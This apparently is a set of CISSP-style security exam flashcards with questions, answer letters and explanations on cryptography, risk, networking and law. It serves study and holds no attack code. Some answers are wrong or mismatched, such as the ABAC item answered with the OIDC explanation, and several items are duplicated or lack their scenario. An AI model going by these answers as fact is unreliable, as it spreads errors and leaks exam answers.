D. When a module is described as having high cohesion and low coupling, that is a good thing. Cohesion reflects how many different types of tasks a module can carry out. High cohesion means that the module carries out one basic task (such as subtraction of values) or several tasks that are very similar (such as subtraction, addition, multiplication). The higher the cohesion, the easier it is to update or modify and not affect the other modules that interact with it. This also means the module is easier to reuse and maintain because it is more straightforward when compared to a module with low cohesion. Coupling is a measurement that indicates how much interaction one module requires to carry out its tasks. If a module has low or loose coupling, this means the module does not need to communicate with many other modules to carry out its job. These modules are easier to understand and easier to reuse than those that depend upon many other modules to carry out their tasks. It is also easier to make changes to these modules without affecting many modules around them.

Use the following scenario to answer Questions 35-36. Zack is a security consultant who has been hired to help an accounting company improve some of their current e-mail security practices. The company wants to ensure that when their clients send the company accounting files and data, the clients cannot later deny sending these messages. The company also wants to integrate a more granular and secure authentication method for their current mail server and clients. Which of the following best describes how client messages can be dealt with and addresses the first issue outlined in the scenario? A. The company needs to integrate a public key infrastructure and the Diameter protocol. B. Clients must encrypt messages with their public key before sending them to the accounting company. C. The company needs to have all clients sign a formal document outlining nonrepudiation requirements. D. Clients must digitally sign messages that contain financial information.

D. When clients digitally sign messages, this ensures nonrepudiation. Since the client should be the only person who has his private key, and only his public key can decrypt it, the e-mail must have been sent from the client. Digital signatures provide nonrepudiation protection, which is what this company needs

Which of the following statements is false? A. A disaster recovery team's primary task is to restore critical business functions at the alternate backup processing site. B. A disaster salvage team's task is to ensure that the primary site returns to normal processing conditions. C. The disaster recovery plan should include how the company will return from the alternate site to the primary site. D. When returning to the primary site, the most critical applications should be brought back first.

D. When returning to the primary site, the most critical applications should be brought back first.

Which of the following best describes why rebooting helps with system performance in the situation described in this scenario? A. Software is not using cache memory properly. B. Software is carrying out too many mode transitions. C. Software is working in ring 0. D. Software is not releasing unused memory.

D. When software is poorly written, it could be allocating memory and not properly releasing it. This can affect the performance of the whole system, since all software processes have to share a limited supply of memory. When a system is rebooted, the memory allocation constructs are reset.

When is it acceptable to not take action on an identified risk? A. Never. Good security addresses and reduces all risks. B. When political issues prevent this type of risk from being addressed. C. When the necessary countermeasure is complex. D. When the cost of the countermeasure outweighs the value of the asset and potential loss.

D. When the cost of the countermeasure outweighs the value of the asset and potential loss.

Which of the following best describes why Tim should be concerned about the second issue addressed in the scenario? A. Software and devices that are scanning traffic for suspicious activity may only be configured to evaluate one system type. B. Software and devices that are monitoring traffic for illegal activity may only be configured to evaluate one service type. C. Software and devices that are monitoring traffic for illegal activity may only be configured to evaluate two protocol types. D. Software and devices that are monitoring traffic for suspicious activity may only be configured to evaluate one traffic type.

D. While many of these automatic tunneling techniques reduce administration overhead because network administrators do not have to configure each and every system and network device with two different IP addresses, there are security risks that need to be understood. Many times users and network administrators do not know that automatic tunneling capabilities are enabled, and thus they do not ensure that these different tunnels are secured and/or are being monitored. If you are an administrator of a network and have IDS, IPS, and firewalls that are only configured to monitor and restrict IPv4 traffic, then all IPv6 traffic could be traversing your network insecurely. Attackers use these protocol tunnels and misconfigurations to get past these types of security devices so that malicious activities can take place unnoticed. Products and software may need to be updated to address both traffic types, proxies may need to be deployed to manage traffic communication securely, IPv6 should be disabled if not needed, and security appliances need to be configured to monitor all traffic types.

Wireless LAN technologies have gone through different versions over the years to address some of the inherent security issues within the original IEEE 802.11 standard. Which of the following provides the correct characteristics of Wi-Fi Protected Access 2 (WPA2)? A. IEEE 802.1X, WEP, MAC B. IEEE 802.1X, EAP, TKIP C. IEEE 802.1X, EAP, WEP D. IEEE 802.1X, EAP, CCMP

D. Wi-Fi Protected Access 2 requires IEEE 802.1X or preshared keys for access control, EAP or preshared keys for authentication, and AES algorithm in counter mode with CBC-MAC Protocol (CCMP) for encryption.

Which of the following statements is true of audits conducted by external parties? A. They are inherently adversarial in nature, as the entity under inspection must seek to limit the extent of adverse findings, while the external party must seek to maximize them. B. Participation by the internal teams within the entity under inspection must be kept to a bare minimum, so as not to skew the objectivity of the external teams' findings. C. The terms of any contractual obligations relevant to the controls being audited must be kept confidential and not divulged to the external party conducting the inspection, so as not to skew the objectivity of the external teams' methodology or framework. D. The activities of the internal and external teams must be collaborative in nature, so as to maximize the auditor's ability to accurately assess the controls under inspection.

D. Without a high degree of collaboration and cooperation between the teams on both sides, any such audit will be far less likely to come to an accurate assessment of the state of the security controls being inspected. An adversarial approach will greatly decrease the overall value of the effort, while simultaneously increasing the cost of performing it. One of the main goals of any external audit is to engender trust, which invariably requires honest and active cooperation among all participants.

Should kernel-level flaws be a significant concern if found during a security assessment? Why? A. no, because they are relatively rare. B. No, because they typically are too difficult to exploit. C. No, because they are the easiest to remediate. D. Yes, because a successful exploit of them gives the attacker a system-level control.

D. Yes, because a successful exploit of them gives the attacker a system-level control.

If Marge uses her private key to create a digital signature on a message she is sending to George, but she does not show or share her private key with George, what is it an example of? A. Key clustering B. Avoiding a birthday attack C. Providing data confidentiality D. Zero knowledge proof

D. Zero knowledge proof means that someone can tell you something without telling you more information than you need to know. In cryptography, it means proving that you have a specific key without sharing that key or showing it to anyone. A zero knowledge proof is an interactive method for one party to prove to another that a (usually mathematical) statement is true without revealing anything sensitive.

What mechanism can be use to ensure that a failed transaction or system failure returns the subject to a meaningful point in some process? A. bookmark. B, cyclical redundancy check. C. inference. D. checkpoint.

D. checkpoint.

Each distinguished name (DN) in an LDAP directory represents a collection of attributes about a specific object and is stored in the directory as an entry. DNs are composed of Common Name (CN) components, which describe an object, and Domain Components (DC) which describe the domain in which the object resides. Which of the following makes the most sense when constructing a DN? A. DC= Shon Harris, cn= Logical security, dc=com. B. Cn=Shon harris, dc=LogicalSecurity, dc=com. C. cn=Shon Harris, cn=LogicalSEcurity,CN=com D. cn=Shon Harris,dc=LogicalSecurity, dc=com

D. cn=Shon Harris,dc=LogicalSecurity, dc=com

Which of the following is the LEAST effective security control regarding sensitive data stored on mobile devices? A. Back up all devices to an organizationally managed repository. B. implement full-volume encryption on all mobile devices. C. Require that all mobile devices be wipe able remotely if stolen or misplaced. D. enact a policy prohibiting the access or storage of sensitive corporate data on personal mobile devices.

D. enact a policy prohibiting the access or storage of sensitive corporate data on personal mobile devices.

Certain types of attacks have been made more potent by which of the following advances to microprocessor technology? A. increased circuits, cache memory, and multiprogramming. B. Dual mode computation. C. Direct memory access i/o D. increases in processing power.

D. increases in processing power.

Which of the following advances to microprocessors architecture has increased some vulnerabilities? A. distributed environments B. network connectivity C. increased circuits, cache memory, and multiprogramming. D. increases in processing power.

D. increases in processing power.

What is the Network Time Protocol (NTP), and why is it important in security assessments? A. It is a peer-to-peer for system time synchronization, and it is important to ensure that peer systems' time-based authentication functions properly. B. It is a client/server protocol for system time synchronization, and it is important to ensure that peer systems' time-based authentication functions. s properly. C. It is a peer-to-peer protocol for system time synchronization, and is important to ensure that system logs have timestamps that are consistent across all critical systems. D. it is a client/server protocol for system time synchronization, and it is important to ensure that system logs have timestamps that are consistent across all critical systems.

D. it is a client/server protocol for system time synchronization, and it is important to ensure that system logs have timestamps that are consistent across all critical systems.

An elliptic curve cryptosystem is an asymmetric algorithm. What sets it apart from other asymmetric algorithms? A. it provides digital signatures, secure key distribution, and encryption. B. it computes discrete logarithms in a finite field. C. it uses a larger percentage of resources to carry out encryption. D. it is more efficient.

D. it is more efficient.

Which of the following correctly describes a drawback of symmetric key systems? A. computationally less intensive than asymmetric systems. B. work much more slowly than asymmetric systems. C. carry out mathematically intensive tasks. D. key must be delivered via secure courier.

D. key must be delivered via secure courier.

Which of the following is not an attack against operations? A. brute force. B. Denial of service. C. Buffer overflow D. known plaintext attack

D. known plaintext attack

If a systems development life cycle methodology is inadequate, the most serious risk is likely to be that the project: A. will be completed late. B. Will exceed cost estimates. C. Will be incompatible with existing systems. D. will fail to meet business and user needs.

D. will fail to meet business and user needs.

Should kernel-level flaws be a significant concern if found during a security assessment? Why? A. no, because they are relatively rare. B. no, because they are typically are too difficult to exploit. C. no, because they are easiest to remediate. D. yes, because a successful exploit of them gives the attacker system-level control.

D. yes, because a successful exploit of them gives the attacker system-level control.

As with logical access controls, audit logs should be produced and monitored for physical access controls. Which of the following statements is correct about auditing physical access? A. unsuccessful access attempts should be logged but only need to be reviewed by a security guard. B. Only successful access attempts should be logged and reviewed. C. Only successful access attempts should be logged and reviewed. D. All unsuccessful access attempts should be logged and reviewed.

D.All unsuccessful access attempts should be logged and reviewed.

Which of the following is not an example of due care? A. providing security awareness training to all employees. B. Requiring employees to sign nondisclosure agreements. C. Implementing mandatory vacations for all employees. D.Allowing a key job function to be completed by one highly qualified employee.

D.Allowing a key job function to be completed by one highly qualified employee.

Integrity

Hashing (Data integrity) Configuration management (System integrity) Change control (process integrity) Access Control (physical and technical) Software digital signing Transmission cyclic redundancy check (CRC) functions

Security Program Development

ISO/IEC 27000 series: International standards on how to develop and maintain an ISMS developed by ISO and IEC.

Software License Agreement

Individuals who may use the software. amount of information that may be processed. locations of use. number of servers.

TOGAF

Model and methodology for the development of enterprise architectures developed by the open group.

OECD

Organization for Economic Cooperation and Development

Risk Categories

Physical Human interaction Equipment malfunction inside and outside attacks misuse of data loss of data application error

Preventive: Administrative

Policies and procedures Effective hiring practices pre-employment background checks Controlled termination processes Data classification and labeling Security awareness

Controls

Preventive: Intended to avoid an incident from occurring Detective: helps identify an incident's activities and potentially an intruder Deterrent: intended to discourage a potential attacker Recovery: intended to bring the environmental back to regular operations Compensating: controls that provide an alternative measure of control.

Encryption

Process of converting readable data into unreadable characters to prevent unauthorized access.

ITIL

Process to allow for IT service management developed by the United Kingdom's office of government commerce

FERPA

Regulates handling of student educational records. provides right of inspection provides right to request corrections restricts release of personal information.

Which of the following memory types utilize a clock cycle to improve its efficiency A. DRAM B. SDRAM C. BEBO DRAM D PROM

SDRAM

PII Elements

Social Security Numbers Driver's license numbers. bank account numbers. Notify individuals if there is a breach.

18 USC 2701 et seq

Stored wire and electronic communications and transactional records access

job rotation

a job enrichment strategy that involves moving employees from one job to another

Corruption/modification is one of the biggest threats to an operations environment. Which of the following is the typical culprit in this type of threat?

a. Employees

How many bits make up the effective DES key? A 56 B. 64 C 32 D 16

A 56

Baselines

A minimum level of security.

Digital certificates

A technology used to associate a user's identity to a public key.

Water is most effective against: A. class A fires B. Class B fires C. Class C fires D. class F fires.

A. Class A fires.

Machine language exists in which of the following categories? A. Generation one. B. Generation two. C. Generation three. D. Generation four.

A. Generation one.

IPSec uses ___ for key management. A. IKE. B. MPLS C. PPP D. NAT

A. IKE.

Isochronous processes rely on ___ A. Time constraints B. Content variables C. Error Checking D. Malformed packets

A. Time constraints

Which type of access control model allows data owners to be the ultimate source for determining access to system resources? A. discretionary. B. mandatory C. brewer and nash d. clark-wilson

A. discretionary.

Tactical planning is: A. mid-term B. long-term C. day-to-day D. six months.

A. mid-term

19. Which of the following is not addressed by the data retention policy? A.What data to keep B. For whom data is kept C. How long data is kept D. Where data is kept

B. For whom data is kept

What agency usually works with the FBI when investigating computer crimes? A. (isc)2 B.Secret Service. C. CIA. D. State Police.

B. Secret Service.

What is the biggest challenge with respect to paper records? A. They contain sensitive information. B. Technical controls cannot easily be applied. C. They are difficult to destroy. D. Watermarking is easy to defeat.

B. Technical controls cannot easily be applied.

Production code should come only from which of the following? A. The project's lead developer. B. The librarian in charge of the repository. C. The approved project manager. D. The quality assurance testing team.

B. The librarian in charge of the repository.

Guidelines

Recommended actions and operational guides to users

COSO Framework

control environment, risk assessment, control activities, information and communication, monitoring

What is maximum tolerable downtime (MTD)? A. The maximum elapsed time required to complete the recovery of application data. B. Minimum elapsed time required to complete the recovery of application data. C. The number of minutes allowed within the SLA. D. Maximum delay businesses can tolerate and still remain viable.

. Maximum delay businesses can tolerate and still remain viable.

GDPR Provisions

Consent right to be informed right to restrict processing right to be forgotten data breaches

Which of the following describes a cold site? A. Fully equipped and operational in a few hours B. Partially equipped with data processing equipment C. Expensive and fully configured D. Provides environmental measures but no equipment

D. A cold site only provides environmental measures—wiring, air conditioning, raised floors—basically a shell of a building and no more.

Who was involved in developing the first public key encryption system? A. Adi Shamir B. Ross Anderson C. Bruce Schneier D. Martin Hellman

D. Martin Hellman

Paul needs to outline different exercise types for the various systems in the environment. Which of the following does not providing the correct mapping types that Paul needs to implement? A. Low-impact systems, a tabletop exercise. B. Moderate-impact systems, a functional exercise. C. High-impact systems, a full-scale functional exercise. D. Medium-impact, structured walk through.

D. Medium-impact, structured walk through.

Risk Management

Physical damage human interaction Equipment malfunction inside and outside attacks misuse of data loss of data application error

COBIT

A framework developed by the Information Systems Audit and Control Association and the IT Governance Institute. Defines the goals for the controls that should be used to properly manage IT and ensure IT maps to business needs. Four domains: Plan and Organize, Acquire and Implement, Deliver and Support, and Monitor and Evaluate

Quantitative Risk Analysis

A numerical assessment of the probability and impact of the identified risks. Quantitative risk analysis also creates an overall risk score for the project.

Capability Maturity Model Integration (CMMI)

A process improvement approach that provides organizations with the essential elements of effective processes

Quantitative risk analysis

A risk analysis method that attempts to use percentages in damage estimations and assigns real numbers to the costs of countermeasures for particular risks and the amount of damage that could result from the risk. Compare to qualitative risk analysis.

Alice, Bob, and many of their colleagues have spent months constructing a business continuity plan (BCP) for their enterprise. What is the first test of their finding that should be conducted? A. Checklist test. B. Structured walk-through test . C. Simulation test. D. parallel test.

A. Checklist test.

Crime prevention through environmental design is a discipline that outlines how the proper design . of a physical environment can reduce crime by directly affecting human behavior. Of CPTED's three main components, what is illustrated in the following photo? A. natural surveillance. B. Target hardening. C. Natural access control. D. Territorial reinforcement.

A. natural surveillance.

Which of the following laws addresses wiretapping? A. Computer fraud and abuse act of 1986 B. Electronic Communications Privacy Act of 1986. C. HIPPA. D. Privacy Act of 1974

B. Electronic Communications Privacy Act of 1986.

Packets that contain routing information within their headers are referred to as what? A. Broadcasting. B. Source Routing C. Forwarding D. Poisoning.

B. Source Routing

Which of the following is NOT a wide area protocol? A. Frame relay B. X.25 C. 802.11 D. MPLS.

C. 802.11

Which of the following ciphers uses a polyalphabetic substitution process? A. Cesar Cipher. B. Simple substitution C. Vigenere D. ATBASH

C. Vigenere

Which of the following best describes the situation that the network administrators are experiencing? A. brownouts. B. Surges. C. in-rush current. D. power line interference

C. in-rush current

In twisted-pair cabling, the tighter the wire is twisted, the more resistant the cable is to: A. attenuation and breaking B. causing fire hazards C. interference and attenuation D. corrosion.

C. interference and attenuation

Which is not a preventative physical security control? A. fences. B. locks C. Security guard. D. Access and Audit log.

D. Access and Audit log.

AT which phase of the system development life cycle (SDLC) is it most important for security to be considered? A. Operations/Maintenance. B. Implementation. C. Acquisition/development. D. Initiation.

D. Initiation.

What does the security auditor report to? A. Data owners. C. Data custodians C. External audit organizations D. Senior management.

D. Senior management.

The attackers in this situation would be seen as which of the following? A. Vulnerability B. Threat C. Risk D. Threat agent

D. The attackers are the entities that have exploited a vulnerability; thus, they are the threat agent.

A digital identity is made up of attributes, entitlements, and traits. Which of the following has the incorrect mapping when considering these identity characteristics? A. Attributes=department, role in company, shift time, clearance. B. Entitlements= resources available to user, authoritative rights in the company C. Traits= biometric information, height, sex D. none of the above.

D. none of the above.

All of the following controls are important to specify when defining a data classification scheme, except: A. marking, labeling and handling procedures B. physical security protections. C. backup and recovery procedures. D. personnel clearance procedures.

D. personnel clearance procedures.

If sensitive data is stored on a CD-ROM and it is no longer needed, which would be the proper way of disposing of the data? A. Degaussing. B. Erasing. C. purging D. physical destruction.

D. physical destruction.

Which would require the lowest level of protection? A. System logs B. backup copies of system logs C. Hard copes of sensitive company information D. user training documentation.

D. user training documentation.

Security Governance

Information Governance Committee Risk Management Committee Board of Directors

Availability Controls

Malicious attackers Component failures Application failures Utility failures

ITIL

The Information Technology Infrastructure Library (ITIL) is a set of concepts and practices for Information Technology Services Management (ITSM), Information Technology (IT) development and IT operations. ITIL gives detailed descriptions of a number of important IT practices and provides comprehensive checklists, tasks and procedures that any IT organization can tailor to its needs.

18 USC 2510 et Seq

Wire and electronic communications interception and interception of oral communications

Jared plays a role in his company's data classification system. in this role, he must practice due care when accessing data and ensure that the data is used only in accordance with allowed policy while abiding by the rule set for the classification of the data. he does not determine, maintain, or evaluate controls, so what is Jared's role? A. data owner B. data custodian c. data user d. information systems auditor

c data user

Building a business case

justify the investment of time and money balance security and business concerns achieve confidentiality, integrity, and availability goals

Patch management

keeping operating systems and application's patched to current levels also enhances availability

copyright

protect creative works against theft. works, web content, art, music, computer software. granted to the creator automatically. Provided for 70 years beyond creator's death. Moves covered work to public domain after expiration.

Security Policy

provide the foundation for a security program. are written carefully over a long period of time. require compliance from all employees.

Corporate Acquisition

get together to get rid of redundancies between security systems.

Corporate divestiture

require separate controls

John is a security engineer at a company that develops highly confidential products for various government agencies. While his company has VPNs set up to protect traffic that travels over the Internet and other nontrusted networks, he knows that internal traffic should also be protected. Which of the following is the best type of approach John's company should take? A. Implement a data link technology that provides 802.1AE security functionality. B. Implement a network-level technology that provides 802.1AE security functionality. C. Implement TLS over L2TP. D. Implement IPSec over L2TP.

A. 802.1AE is the IEEE MAC Security standard (MACSec), which defines a security infrastructure to provide data confidentiality, data integrity, and data origin authentication. Where a VPN connection provides protection at the higher networking layers, MACSec provides hop-by-hop protection at layer 2.

Use the following scenario to answer Questions 48-49. Frank is the new manager of the in-house software designers and programmers. He has been telling his team that before design and programming on a new product begins, a formal architecture needs to be developed. He also needs this team to understand security issues as they pertain to software design. Frank has shown the team how to follow a systematic approach that allows them to understand how different compromises could take place with the software products they develop. Which of the following best describes what an architecture is in the context of this scenario? A. Tool used to conceptually understand the structure and behavior of a complex entity through different views B. Formal description and representation of a system and the components that make it up C. Framework used to create individual architectures with specific views D. Framework that is necessary to identify needs and meet all of the stakeholder requirements

A. An architecture is a tool used to conceptually understand the structure and behavior of a complex entity through different views. An architecture provides different views of the system, based upon the needs of the stakeholders of that system.

Which of the following are acceptable components of NIST's Digital Signature Standard (DSS)? A. Asymmetric Algorithm DSA, RSA, ECDSA, and SHA for hashing. B. Asymmetric RSA, Symmetric AES, and MD5 for hashing. C. Asymmetric DSA, Symmetric AEA, And SHA for hashing. D. Only symmetric AES and SHA for hashing.

A. Asymmetric Algorithm DSA, RSA, ECDSA, and SHA for hashing.

Critical support areas are defined as: A. Business units or functions that must be present to sustain continuity of business, maintain life safety, and avoid public embarrassment. B. Business units or functions that may be replaced by others in a disaster situation. C. Human resource and information technologies D. Business units or functions that require support against manmade disasters.

A. Business units or functions that must be present to sustain continuity of business, maintain life safety, and avoid public embarrassment.

How is data normalizing accomplished in a data warehouse? A. By removing redundancies. B. By removing dissimilar information. C. By creating heterogenous tuples. D. By creating heterogenous attributes.

A. By removing redundancies.

Jan's company has kicked off a huge software development effort. The project will affect every department and has representatives from each group on the development team. The team is using automated tools and mechanisms to help reduce cost and streamline the process. Of the following development types, which sounds like the one Jan's company is using? A. CASE B. Extreme Programming C. CleanRoom D. RAD

A. CASE

Which of the following produces code that is platform independent? A. Java B. ActiveX C. VB. D. C

A. Java

John is a field service manager for a DSL company. He is fairly confident that one of his senior field technicians is stealing equipment from the company. John immediately notifies the VP of HR about the problem. What is the next step? A. Consult the company's organizational and security policy. B. immediately suspend the employee and revoke all permissions. C. Because the suspect is a senior-level employee, give him the benefit of the doubt, but begin heavy monitoring. D. Terminate immediately as part of the no-tolerance principle.

A. Consult the company's organizational and security policy.

Which of the following best describes the difference between content and context access control? A. Content access control is based on the sensitivity of the data and context access control is based on prior operations. B. Content access control is based on the prior operations and context access control is based on the sensitivity of the data. C. Context pertains to the use of database views and content access control pertains to tracking the requestor's previous access requests. D. Context pertains to the use of the DAC model and content pertains to the use of the MAC model.

A. Content access control is based on the sensitivity of the data and context access control is based on prior operations.

Determining the geographic location of a client IP address in order to route it toward the most proximal topological source of web content is an example of what technology? A. Content distribution network (CDN) B. Distributed name service (DNS) C. Distributed web service (DWS) D. Content domain distribution (CDD)

A. Content distribution networks (CDNs) are designed to optimize the delivery of content, primarily via the Hypertext Transfer Protocol (HTTP), to clients based on their global topological position. In such a design, multiple web servers hosted at many points of presence on the Internet contain the same content in a globally synchronized manner, and so clients can be directed to the nearest source, typically via the manipulation of DNS records based on geolocation algorithms for the requester's IP address.

Which of the following describes the difference between the Data Encryption Standard and the Rivest-Shamir-Adleman algorithm? A. DES is symmetric, while RSA is asymmetric. B. DES is asymmetric, while RSA is symmetric. C. They are hashing algorithms, but RSA produces a 160-bit hashing value. D. DES creates public and private keys, while RSA encrypts messages.

A. DES is a symmetric algorithm. RSA is an asymmetric algorithm. DES is used to encrypt data, and RSA is used to create public/private key pairs

An effective method to shield networks from unauthenticated DHCP clients is through the use of ___ on network switches. A. DHCP snooping B. ARP protection C. DHCP shielding D. ARP caching.

A. DHCP snooping

An effective method to shield networks from unauthenticated DHCP clients is through the use of _______________ on network switches. A. DHCP snooping B. DHCP protection C. DHCP shielding D. DHCP caching

A. DHCP snooping ensures that DHCP servers can assign IP addresses to only selected systems, identified by their MAC addresses. Also, advance network switches now have the capability to direct clients toward legitimate DHCP servers to get IP addresses and to restrict rogue systems from becoming DHCP servers on the network.

Name servers and resolvers are the two primary components of ____. A. DNS. B. ICMP C. IGMP D. PGP

A. DNS.

What does DES stand for? A. Data Encryption Standard. B. Data Encryption System. C. Data Encoding Standard. D. Data Encryption Signature.

A. Data Encryption Standard.

In some cases, two transactions may, in the course of their processing, attempt to access the same portion of a database at the same time, in a way that prevents them from proceeding. Which of the following best describes this type of situation? A. Deadlock B. Corruption C. Deletion D. Misconfiguration.

A. Deadlock

Which of the following best describes why e-mail spoofing is easily executed? A. SMTP lacks an adequate authentication mechanism. B. Administrators often forget to configure an SMTP server to prevent inbound SMTP connections for domains it doesn't serve. C. Keyword filtering is technically obsolete. D. Blacklists are undependable.

A. E-mail spoofing is easy to execute because SMTP lacks an adequate authentication mechanism. An attacker can spoof e-mail sender addresses by sending a Telnet command to port 25 of a mail server followed by a number of SMTP commands. Spammers use e-mail spoofing to obfuscate their identity. Oftentimes, the purported sender of a spam e-mail is actually another victim of spam whose e-mail address has been sold to or harvested by a spammer.

Corruption/modification is one of the biggest threats to an operations environment. Which of the following is the typical culprit in this type of threat? A. Employees B. Viruses C. Bad code. D. Poor maintenance procedures.

A. Employees

Which of the following is the most important reason to log events remotely? A. To prevent against log tampering B. To have several copies of the logs of every event C. To make it easier to back up the logs on a single write-once media D. To facilitate log review and analysis

A. Event logs are usually one of the first things that an intruder will seek to modify in order to cover their tracks. If events are being logged only locally, a compromise means that those logs can no longer be considered valid for investigative purposes.

To better deal with computer crime, several legislative bodies have taken what steps in their strategy? A. Expanded several privacy laws B. Broadened the definition of property to include data C. Required corporations to have computer crime insurance D. Redefined transborder issues

A. Expanded several privacy laws

What is Extensible Markup Language (XML), and why was it created? A. A specification that is used to create various types of markup languages for specific industry requirements B. A specification that is used to create static and dynamic websites C. A specification that outlines a detailed markup language dictating all formats of all companies that use it D. A specification that does not allow for interoperability for the sake of security

A. Extensible Markup Language (XML) was created as a specification to create various markup languages. From this specification, more specific markup language standards were created to be able to provide individual industries with the functions they required. Individual industries use markup languages to meet different needs, but there is an interoperability issue in that the industries still need to be able to communicate with each other.

Matches between the ___ and __ are important because they represent references from on relation to another. A. foreign key and primary key B. foreign key an candidate key C. candidate key and primary key D. primary key and secondary key.

A. Foreign key and primary key.

in TCP, what does a sequence number do? A. Guarantees message delivery B. Disassembles and reassembles packets C. Functions as a fault code indicator D. is used in multiplexing.

A. Guarantees message delivery

What constitutes the Trusted Computing Base (TCB) A. Hardware software, and firmware supporting the security policy. B. Hardware, software, and memory supporting the security policy C. Hardware, software and peripherals supporting the security policy. D. Hardware, software and logic constructs supporting the security policy.

A. Hardware software, and firmware supporting the security policy.

Which of the following best describes the difference between hierarchical storage management (HSM) and storage area network (SAN) technologies? A. HSM uses optical or tape jukeboxes, and SAN is a network of connected storage systems. B. SAN uses optical or tape jukeboxes, and HSM is a network of connected storage systems. C. HSM and SAN are one and the same. The difference is in the implementation. D. HSM uses optical or tape jukeboxes, and SAN is a standard of how to develop and implement this technology.

A. Hierarchical storage management (HSM) provides continuous online backup functionality. It combines hard disk technology with the cheaper and slower optical or tape jukeboxes. Storage area network (SAN) is made up of several storage systems that are connected together to form a single backup network.

Which of the following tunneling protocols is not well suited for dial-up? A. IPSEC. B. PPTP C. PPP D. l2tp

A. IPSEC.

What would be a good reason for the use of thin clients for a company that wants to implement stronger access control? A. Limits user to the functions and capabilities of a secured operating system. B. Fewer desktops to purchase. C. User training reduced. D. Programs become more readily available to users.

A. Limits user to the functions and capabilities of a secured operating system.

The process of mutual authentication involves _______________. A. a user authenticating to a system and the system authenticating to the user B. a user authenticating to two systems at the same time C. a user authenticating to a server and then to a process D. a user authenticating, receiving a ticket, and then authenticating to a service

A. Mutual authentication means it is happening in both directions. Instead of just the user having to authenticate to the server, the server also must authenticate to the user.

Part of the collection and identification stage of the evidence life cycle is marking or labeling evidence. Which statement is not true regarding marking evidence? A. Never mark on the original evidence. B. Seal evidence in envelopes C. When sealing evidence, write on the tape that seals it shut. D. Include initials, date, and case number on your mark.

A. Never mark on the original evidence.

Which of the following is NOT true of OpenID Connect (OIDC)? A. It is mainly used as an open standards-based single sign-on (SSO) mechanism between disparate platforms within an enterprise environment. B. It is layered on the OAuth protocol to allow both authentication and authorization in a transparent way for client resource requests. C. It supports three flows: authorization code flow, implicit flow, and hybrid flow. D. It involves browser redirections from the OpenID provider back to the relying party using authorization codes.

A. OAuth, OpenID, and OIDC are all open protocols and standards for use in authentication and authorization across, rather than within, enterprises to facilitate federated identity management (IdM)

Which of the following attributes are added beyond traditional access control mechanisms (RBAC, MAC, and DAC) in order to implement ABAC? A. Subjects B. Objects C. Actions D. Context

A. OAuth, OpenID, and OIDC are all open protocols and standards for use in authentication and authorization across, rather than within, enterprises to facilitate federated identity management (IdM).

Which of the following is true of a vulnerability assessment? A. The aim is to identify as many vulnerabilities as possible. B. It is not concerned with the effects of the assessment on other systems. C. It is a predictive test aimed at assessing the future performance of a system. D. Ideally the assessment is fully automated with no human involvement.

A. One of the principal goals of a vulnerability assessment is to identify as many security flaws as possible within a given system, while being careful not to disrupt other systems.

What is the difference between POP and IMAP? A. POP downloads e-mail to the user, an IMAP gives the user the choice of downloading or keeping it on the mail server. B. POP gives the user the choice of downloading mail messages or keeping them on the server, and IMAP automatically downloads the messages to the user's computer. C. POP is used when messages need to be transmitted over the internet, and IMAP is used when the messages are exchanged in-house. D. IMAP is used when the messages need to be transmitted over the internet, and POP is used when the messages are exchanged in-house.

A. POP downloads e-mail to the user, an IMAP gives the user the choice of downloading or keeping it on the mail server.

____ are instructions that tell a RAID system how to rebuilt the lost data on the new hard drive. A. Parity B. Clustering C. Striping D. ECC

A. Parity

Which of the following is not normally an element of user accounts management audits? A. Password hashing B. Signed AUPs C. Privileged accounts D. Suspended accounts

A. Password hashing (covered in Chapter 5) is a very common approach to protecting user account passwords, but varies from one platform to the next. It is almost always controlled by the system itself and would normally not be part of the user accounts management audit.

Radius is considered an open protocol, which means what? A. Radius is now a standard that is outlined in RFC 2138 and RFC 2139. Any vendor can follow these standards and develop the protocol to work within their product. B. Radius is open-source, which means that any vendor can contact cisco and receive the code for for free. C. Radius is not an open protocol, but a de facto standard. D. radius is a proprietary protocol, but open to any vendor who pays the fee to use it.

A. Radius is now a standard that is outlined in RFC 2138 and RFC 2139. Any vendor can follow these standards and develop the protocol to work within their product.

Which centralized access control authentication protocol is also an adopted internet standard? A. Radius. B. TACACS. C.SECURID D. CRYPTOCARD

A. Radius.

What is the best description of a security kernel from a security point of view? A. Reference monitor B. Resource manager C. Memory mapper D. Security perimeter

A. Reference monitor

With respect to external audits, what is the difference between a second-party audit and a third-party audit? A. A second-party audit is typically tied to the terms of a contract between business entities, while a third-party audit is usually used to determine if an entity is compliant with applicable government regulations. B. A third-party audit is typically tied to the terms of a contract between business entities, while a second-party audit is usually used to determine if an entity is compliant with applicable government regulations. C. A third-party audit is performed without the assistance of the entity's internal teams, whereas a second-party audit makes extensive use of them. D. There is no real distinction. Both terms can be used interchangeably.

A. Second-party audits are typically performed by external parties, in order to give business partners the assurance that the entity being audited is living up to the terms of contractual agreements between the two with respect to due care and due diligence in the handling of the business partner's assets. Third-party audits are commonly performed as part of an entity's requirements to satisfy regulatory compliance with respect to systems processing information deemed to be in the public interest.

Dan is going to send sensitive data over a potentially compromised network link. Which of the following technologies is least likely to help him ensure that the data is not intercepted in transit? A. Secure socket Layer (SSL) B. Transport Layer Security (TLS) C. Virtual Private Network (VPN) D. Internet Protocol Security (IPSec)

A. Secure socket Layer (SSL)

Use the following scenario to answer Questions 36-38. Lance has been brought in as a new security officer for a large medical equipment company. He has been told that many of the firewalls and IDS products have not been configured to filter IPv6 traffic; thus, many attacks have been taking place without the knowledge of the security team. While the network team has attempted to implement an automated tunneling feature to take care of this issue, they have continually run into problems with the network's NAT device. Lance has also found out that caching attacks have been successful against the company's public-facing DNS server. He has also identified that extra authentication is necessary for current LDAP requests, but the current technology only provides password-based authentication options. Based upon the information in the scenario, what should the network team implement as it pertains to IPv6 tunneling? A. Teredo should be configured on IPv6-aware hosts that reside behind the NAT device. B. 6to4 should be configured on IPv6-aware hosts that reside behind the NAT device. C. Intra-Site Automatic Tunnel Addressing Protocol should be configured on IPv6-aware hosts that reside behind the NAT device. D. IPv6 should be disabled on all systems.

A. Teredo encapsulates IPv6 packets within UDP datagrams with IPv4 addressing. IPv6-aware systems behind the NAT device can be used as Teredo tunnel endpoints even if they do not have a dedicated public IPv4 address.

Which of the following is not true of a forensic investigation? A. The crime scene should be modified as necessary. B. A file copy tool may not recover all data areas of the device that are necessary for investigation. C. Contamination of the crime scene may not negate derived evidence, but it should still be documented. D. Only individuals with knowledge of basic crime scene analysis should have access to the crime scene.

